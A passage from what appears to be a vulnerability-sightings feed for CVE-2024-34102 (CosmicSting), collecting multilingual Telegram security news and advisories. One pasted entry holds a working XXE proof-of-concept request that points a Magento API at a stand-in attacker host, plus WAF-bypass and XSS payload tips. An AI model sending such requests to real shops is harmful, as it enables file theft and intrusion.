\u0437\u0430\u0440\u0430\u0436\u0430\u0435\u0442 Linux-\u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044f 20 \u0442\u044b\u0441\u044f\u0447 \u043e\u0448\u0438\u0431\u043e\u043a \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438.  \u041f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0412\u041f\u041e \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0440\u0443\u0442\u043a\u0438\u0442\u043e\u043c \u0438 \u0446\u0435\u043b\u044b\u043c \u043d\u0430\u0431\u043e\u0440\u043e\u043c \u0434\u0440\u0443\u0433\u0438\u0445 \u0442\u0440\u044e\u043a\u043e\u0432 \u0434\u043b\u044f \u043c\u0430\u043a\u0441\u0438\u043c\u0438\u0437\u0430\u0446\u0438\u0438 \u0441\u043a\u0440\u044b\u0442\u043d\u043e\u0441\u0442\u0438. \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0444\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043e\u0431\u044b\u0447\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043c\u0430\u0439\u043d\u0435\u0440.\n\n\u0412 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438, \u0440\u0430\u043d\u0435\u0435 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u0443\u0435\u043c\u043e\u0439 APT Mustang Panda, \u043d\u0430\u0448\u0451\u043b\u0441\u044f \u043a\u043b\u0430\u0441\u0442\u0435\u0440, \u0432\u0438\u0434\u0438\u043c\u043e \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0438\u0439 \u043d\u043e\u0432\u043e\u0439 \u043f\u043e\u0434\u0433\u0440\u0443\u043f\u043f\u0435, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0439 CeranaKeeper. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0434\u043b\u044f \u04212 \u0438 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438. \n\n\ud83d\udc6e\u200d\u2640\ufe0f\u041a\u0440\u0430\u0442\u043a\u0438\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u043d\u043e\u0432\u044b\u0445 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0439 \u0438 \u0430\u0442\u0430\u043a Akira ransomware: TTP, IoC, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043f\u043e \u0445\u0430\u043d\u0442\u0438\u043d\u0433\u0443.\n\n\u2328\ufe0f\u041e\u0431\u0437\u043e\u0440 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 CyberVolk, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0430\u0447\u0438\u043d\u0430\u043b\u0430 \u0441 \u0445\u0430\u043a\u0442\u0438\u0432\u0438\u0437\u043c\u0430, \u0430 \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0430\u043a\u0442\u0438\u0432\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u043e \u043c\u043e\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 ransomware.\n\n\ud83d\ude93 \u041e\u043a\u043e\u043b\u043e 5% \u0432\u0441\u0435\u0445 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0449\u0438\u0445 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Magento/Adobe Commerce, \u0431\u044b\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u044b \u044d\u0442\u0438\u043c \u043b\u0435\u0442\u043e\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0432\u0435\u0431-\u0441\u043a\u0438\u043c\u043c\u0435\u0440 \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043e\u043f\u043b\u0430\u0442\u044b. \u0420\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u043d\u0430\u043f\u0435\u0440\u0435\u0433\u043e\u043d\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 CVE-2024-34102 (CosmicSting).\n\n\ud83c\udf44 FIN7 \u043b\u043e\u0432\u0438\u0442 \u043d\u0430 \u043a\u043b\u0443\u0431\u043d\u0438\u0447\u043a\u0443: \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 NetSupport RAT \u0447\u0435\u0440\u0435\u0437 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0434\u0438\u043f\u0444\u0435\u0439\u043a-\u043e\u0431\u043d\u0430\u0436\u0451\u043d\u043a\u0438.\n\n\ud83d\udcf1 \u0410 \u0432 App Store \u0438 Google Play \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0442\u0440\u0435\u0439\u0434\u0438\u043d\u0433\u0430 \u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0438\u0434\u0438\u043c\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0441\u0445\u0435\u043c pig butchering.\n\n\ud83c\udf83\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440\u043e\u0432: StealC (\u0430\u0436 \u0432 \u0442\u0440\u0451\u0445 \u0447\u0430\u0441\u0442\u044f\u0445) \u0438 Amnesia.\n\n\ud83d\udc40 \u041d\u0430 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u0431\u044b\u043b\u0430 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0434\u0432\u0443\u0445 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439:  CVE-2024-29824 \u0432 Ivanti Endpoint Manager \u0438 CVE-2024-45519 \u0432 \u043f\u043e\u0447\u0442\u043e\u0432\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 Zimbra.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #APT #\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 @\u041f2\u0422", "creation_timestamp": "2024-10-07T15:36:21.000000Z"}, {"uuid": "06df555a-735a-4f42-98a9-10e547eb5c6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://t.me/cKure/13181", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 \u2757\ufe0f Sansec researchers are warning of a critical CosmicSting vulnerability that affects almost 75% of sites using Adobe Commerce and Magento.\n\nDespite the release of emergency fixes, nine days later the situation remains unchanged: millions of sites are at risk of serious XML external entity injection (XXE) and RCE attacks.\n\nCosmicSting is also tracked as CVE-2024-34102 (CVSS: 9.8) and represents the most severe bug in Magento and Adobe Commerce in the last two years.\n\nBy itself, it allows an attacker to view private files (for example, files with passwords). However, when combined with a recent bug in Linux, iconv (CVE-2024-2961) carries powerful malicious RCE potential.\n\nThe issue affects Adobe Commerce 2.4.7 (and earlier versions, including 2.4.6-p5, 2.4.5-p7, 2.4.4-p8), Adobe Commerce Extended Support 2.4.3-ext-7 (2.4.2-ext -7, 2.4.1-ext-7, 2.4.0-ext-7, 2.3.7-p4-ext-7 and earlier), Magento 2.4.7 (and earlier including 2.4.6-p5 , 2.4.5-p7, 2.4.4-p8), as well as the Adobe Commerce Webhooks plugin (from 1.2.0 to 1.4.0).\n\nAs Sansec notes, the absence of a detailed technical description in the Adobe bulletin will not prevent active exploitation, since effective attack methods can be modeled by analyzing the patch code.\n\nGiven its high severity and low sophistication, CosmicSting can now be considered one of the most destructive attacks in e-commerce history, along with Shoplift, Ambionics and Trojan Order, according to Sansec .\n\nResearchers recommend that platform administrators apply patches for CVE-2024-34102 as soon as possible or follow the proposed mitigation measures.", "creation_timestamp": "2024-06-22T07:57:07.000000Z"}, {"uuid": "e3481db9-2b32-4024-831f-454d09993709", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7945", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aBurp Extension to test for CVE-2024-34102\nURL\uff1ahttps://github.com/crynomore/CVE-2024-34102\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-11T11:56:18.000000Z"}, {"uuid": "cae73e81-9a91-423f-abd1-ada9e6a2a149", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "exploited", "source": "https://t.me/cyber_hsecurity/1608", "content": ":\n\u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u0645\u0634\u0643\u0644\u0629 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631 wanEditor v4.7.11 \u0648\u062a\u0645 \u0625\u0635\u0644\u0627\u062d\u0647\u0627 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u064a\u0646 v.4.7.12 \u0648v.5\u060c \u0648\u0647\u064a \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0628\u0631\u0645\u062c\u0629 \u0627\u0644\u0646\u0635\u064a\u0629 \u0639\u0628\u0631 \u0627\u0644\u0645\u0648\u0627\u0642\u0639 (XSS) \u0639\u0628\u0631 \u0648\u0638\u064a\u0641\u0629 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0635\u0648\u0631.\n\nhttps://gist.github.com/Mdxjj/5cf0a31e8abf24ed688ceb5b3543516d\n\n\u0647\u0646\u0627\u0643 \u0645\u0634\u0643\u0644\u0629 \u0641\u064a Debezium Community debezium-ui v.2.5 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0645\u062d\u0644\u064a \u0628\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0634\u0648\u0627\u0626\u064a\u0629 \u0639\u0628\u0631 \u0648\u0638\u064a\u0641\u0629 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0635\u0641\u062d\u0629.\n\nhttps://packetstormsecurity.com/files/178794/Debezium-UI-2.5-Credential-Disclosure.html\n\n\u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0645\u062d IBM Security Verify Access Docker 10.0.0 \u062d\u062a\u0649 10.0.6 \u0644\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0645\u062d\u0644\u064a \u0628\u062a\u0635\u0639\u064a\u062f \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a\u0647 \u0628\u0633\u0628\u0628 \u0627\u0644\u062a\u062d\u0642\u0642 \u063a\u064a\u0631 \u0627\u0644\u0635\u062d\u064a\u062d \u0645\u0646 \u0627\u0644\u0634\u0647\u0627\u062f\u0629. \u0645\u0639\u0631\u0641 IBM X-Force: 292416.\n\nhttps://exchange.xforce.ibmcloud.com/vulnerabilities/292416\n\n\u064a\u0632\u064a\u0644 javascript-deobfuscator \u062a\u0642\u0646\u064a\u0627\u062a \u062a\u0634\u0648\u064a\u0634 JavaScript \u0627\u0644\u0634\u0627\u0626\u0639\u0629. \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u0627\u0644\u0645\u062a\u0623\u062b\u0631\u0629\u060c \u064a\u0645\u0643\u0646 \u0623\u0646 \u062a\u0624\u062f\u064a \u0627\u0644\u062d\u0645\u0648\u0644\u0627\u062a \u0627\u0644\u0645\u0639\u062f\u0629 \u0648\u0627\u0644\u062a\u064a \u062a\u0633\u062a\u0647\u062f\u0641 \u062a\u0628\u0633\u064a\u0637 \u0627\u0644\u062a\u0639\u0628\u064a\u0631 \u0625\u0644\u0649 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629. \u0644\u0642\u062f \u062a\u0645 \u062a\u0635\u062d\u064a\u062d \u0647\u0630\u0647 \u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631 1.1.0. \u064a\u064f\u0646\u0635\u062d \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0648\u0646 \u0628\u0627\u0644\u062a\u062d\u062f\u064a\u062b. \u064a\u062c\u0628 \u0639\u0644\u0649 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646 \u063a\u064a\u0631 \u0627\u0644\u0642\u0627\u062f\u0631\u064a\u0646 \u0639\u0644\u0649 \u0627\u0644\u062a\u0631\u0642\u064a\u0629 \u062a\u0639\u0637\u064a\u0644 \u0645\u064a\u0632\u0629 \u062a\u0628\u0633\u064a\u0637 \u0627\u0644\u062a\u0639\u0628\u064a\u0631.\n\nhttps://github.com/ben-sb/javascript-deobfuscator/commit/630d3caec83d5f31c5f7a07e6fadf613d06699d6\n\n\u062d\u0633\u064a\u0646 \u0631\u0648\u0632\u0643\u0627\u0631:\nCVE-2024-36684\nCRITICAL\nInformation\nCPEs\nPlugins\nDescription\nIn the module \"Custom links\" (pk_customlinks) <= 2.3 from Promokit.eu for PrestaShop, a guest can perform SQL injection. The script ajax.php have a sensitive SQL call that can be executed with a trivial http call and exploited to forge a SQL injection.\nReferences\nhttps://security.friendsofpresta.org/modules/2024/06/18/pk_customlinks.html\n\nALSED404:\npayload\n\n\n\n\n\n#Payload\n===================================\n#ALSED404\n\nCVE-2024-34102\u00a0 POC \n\nPOST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://attacker*com/xxe.xml\",\"dataIsURL\":true,\"options\":1337}}}}}}\n\n#CVE #POC\n\n===================================\n#ALSED404\n\nA Cloudflare WAF bypass combining simple (but efficient) tricks\n\n\n\nA payload with some obfuscation & filter evasion tricks\n\n\n\n#CF #WAF #Bypass #Payload\n===================================\n#ALSED404\n\nXSS WAF Bypass by multi-char HTML entities\n\nfj translates to fj\n>⃒ translates to > + [?]\n<⃒ translates to < + [?]\n\n[?] - Unicode symbol\n\n#BugBounty #Tips\n===================================\n#ALSED404\n\nA Cloudflare WAF bypass combining simple (but efficient) tricks\n\n\n\nA payload with some obfuscation & filter evasion tricks\n\n\n\n#CF #WAF #Bypass #Payload\n===================================\n#ALSED404\n\n\u0647\u0627 \u062c\u0645\u0627\u0639\u0629 \u0627\u0644\u0627\u064a\u0641\u0648\u0646 \ud83d\ude02\ud83d\ude02\ud83d\ude02\ud83d\ude02\n\ud83d\udd12 \u0645\u0637\u0648\u0631\u064a iOS \u0648macOS\u060c \u062a\u0646\u0628\u064a\u0647!\n\n\u0627\u0643\u062a\u0634\u0641 \u0643\u064a\u0641 \u064a\u0645\u0643\u0646 \u0623\u0646 \u062a\u0624\u062f\u064a 3 \u062b\u063a\u0631\u0627\u062a \u0623\u0645\u0646\u064a\u0629 \u062c\u062f\u064a\u062f\u0629 \u0641\u064a CocoaPods\u060c \u0625\u062d\u062f\u0649 \u0623\u062f\u0648\u0627\u062a \u0645\u0637\u0648\u0631\u064a Apple \u0627\u0644\u0634\u0647\u064a\u0631\u0629\u060c \u0625\u0644\u0649 \u0647\u062c\u0645\u0627\u062a \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f \u0639\u0644\u0649 \u062a\u0637\u0628\u064a\u0642\u0627\u062a iOS \u0648macOS.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0647\u0646\u0627: https://thehackernews.com/2024/07/critical-flaws-in-cocoapods-expose-ios.html\n#ALSED404\n\nPayload XSS: \n\n\n#Payload #XSS\n===================================\n#ALSED404\n\nDiscovered an XSS vulnerability but Imperva WAF blocked it?\nTry this XSS payload to bypass Imperva's protection.\n\n\n\n\n#BugBounty #Bypass_Imperva #Payload #XSS\n===================================\n#ALSED404\n\n\u062b\u063a\u0631\u0629 \u062c\u062f\u064a\u062f\u0629 \u0628\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 OpenSSH \u062a\u0646\u0637\u064a RCE \n\ud83d\udea8 New OpenSSH vulnerability (CVE-2024-6409) found in RHEL 9's versions 8.7p1 & 8.8p1, allowing RCE via race condition in privsep child process. \n\nRead: https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html \n\n\u26a0\ufe0f Active exploits detected! This bug is distinct from CVE-2024-6387 but shares similarities.\n#ALSED404", "creation_timestamp": "2024-12-13T19:00:21.000000Z"}, {"uuid": "4b5dae6f-be7d-424c-8f20-3522fa752c6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://t.me/kasperskyb2b/1312", "content": "\ud83d\udc4c \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83d\udda5 \u041a\u043e\u043d\u0433\u043b\u043e\u043c\u0435\u0440\u0430\u0442 \u0430\u0437\u0438\u0430\u0442\u0441\u043a\u0438\u0445 APT \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u0442\u0435\u043b\u0435\u043a\u043e\u043c-\u0441\u0435\u043a\u0442\u043e\u0440 \u0432 \u043d\u0435\u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0439 \u0430\u0437\u0438\u0430\u0442\u0441\u043a\u043e\u0439 \u0441\u0442\u0440\u0430\u043d\u0435 \u0441 \u0446\u0435\u043b\u044c\u044e \u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430, \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0430 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0438, \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0438\u0437\u0443\u0447\u0430\u044f \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438 \u0434\u0435\u0441\u0442\u0440\u0443\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439. \u0412 \u0430\u0442\u0430\u043a\u0435 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u043e \u0412\u041f\u041e Coolclient, Rainyday \u0438\u00a0 Quickheal, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b, \u0440\u0430\u043d\u0435\u0435 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u044b\u0435 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 APT Naikon, Mustang Panda, Nomad Panda/RedFoxtrot. \n\n\u0410 \u0433\u0440\u0443\u043f\u043f\u0430 Velvet Ant \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u043b\u0430 \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u0443\u044e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e, \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u0432 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 F5 BIG-IP \u0443 \u0436\u0435\u0440\u0442\u0432\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0430\u0434\u0430\u043f\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u043f\u043e\u0434 \u0441\u0432\u043e\u0438 \u043d\u0443\u0436\u0434\u044b \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 C2. \u041d\u0430 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u0445 \u0432 \u0441\u0435\u0442\u0438 \u0440\u0430\u0437\u0432\u043e\u0440\u0430\u0447\u0438\u0432\u0430\u043b\u0438 PlugX. \u0412\u0435\u043a\u0442\u043e\u0440 \u0430\u0442\u0430\u043a\u0438 \u2014 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u041e\u0421 \u0447\u0435\u0440\u0435\u0437 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 CVE.\n\n\ud83d\udcf1 \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u043f\u043e\u0432\u043e\u0440\u043e\u0442 \u0432 ransomware-\u0430\u0442\u0430\u043a\u0430\u0445: \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0435 \u0412\u041f\u041e \u0434\u043b\u044f Android \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Rafel RAT \u0440\u0430\u0437\u0432\u043e\u0440\u0430\u0447\u0438\u0432\u0430\u044e\u0442 \u043d\u0430\u00a0 \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0438\u0445 \u0441\u043c\u0430\u0440\u0442\u0444\u043e\u043d\u0430\u0445, \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u044e\u0442 \u0438\u0445 \u0438 \u0442\u0440\u0435\u0431\u0443\u044e\u0442 \u043e\u043f\u043b\u0430\u0442\u0443 \u0447\u0435\u0440\u0435\u0437 Telegram.\u00a0 \u041f\u043e \u043d\u0430\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u044f\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043f\u043e\u0434 \u0440\u0430\u0437\u0434\u0430\u0447\u0443 \u0447\u0430\u0441\u0442\u043e \u043f\u043e\u043f\u0430\u0434\u0430\u044e\u0442 \u0438\u043c\u0435\u043d\u043d\u043e \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0441\u043c\u0430\u0440\u0442\u0444\u043e\u043d\u044b. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0442\u0430\u043a\u0442\u0438\u043a\u0443 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437\u043d\u044b\u0445 \u0433\u043f\u0443\u043f\u043f. \n\n\u0420\u0443\u0442\u043a\u0438\u0442\u044b \u043d\u0430 \u0444\u0435\u0440\u043c\u0435: \u0433\u0440\u0443\u043f\u043f\u0430 UNC3886 \u043e\u0431\u043b\u044e\u0431\u043e\u0432\u0430\u043b\u0430 \u043e\u043f\u0435\u043d\u0441\u043e\u0440\u0441\u043d\u044b\u0435 \u0440\u0443\u0442\u043a\u0438\u0442\u044b\u00a0Reptile \u0438 Medusa, \u0447\u0442\u043e\u0431\u044b \u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u0432\u043e\u0451 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u0441 VMware ESXi. \u0423\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0435\u0439 \u0432\u0435\u0434\u0451\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 Github, \u0446\u0435\u043b\u044c\u044e \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0448\u043f\u0438\u043e\u043d\u0430\u0436. \n\n\ud83d\udfe1 \u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c RaaS RansomHub \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u0435\u0442 \u0441\u0432\u043e\u0438\u043c \"\u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c\"\u00a0 \u043c\u043e\u0434\u0443\u043b\u044c \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u0444\u0435\u0440\u043c\u044b ESXi.\u00a0 \n\n\ud83d\udfe2 \u0421\u0435\u0440\u044c\u0451\u0437\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0435\u043a\u043e\u043c-\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 Adobe Commerce/Magento \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u0443\u0440\u043e\u0432\u043d\u044f API admin. \u0414\u043b\u044f \nCVE-2024-34102 (CVSS 9.8) \u0432\u044b\u043f\u0443\u0449\u0435\u043d \u0444\u0438\u043a\u0441, \u043d\u043e \u0442\u0440\u0438 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u0438 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u043d\u044b\u0445 \u0443\u0433\u0440\u043e\u0437\u0435 \u0441\u0430\u0439\u0442\u043e\u0432 \u0435\u0433\u043e \u043d\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u043b\u0438. \n\n\ud83d\udcbe \u0410 \u0434\u0435\u0444\u0435\u043a\u0442 \u0432 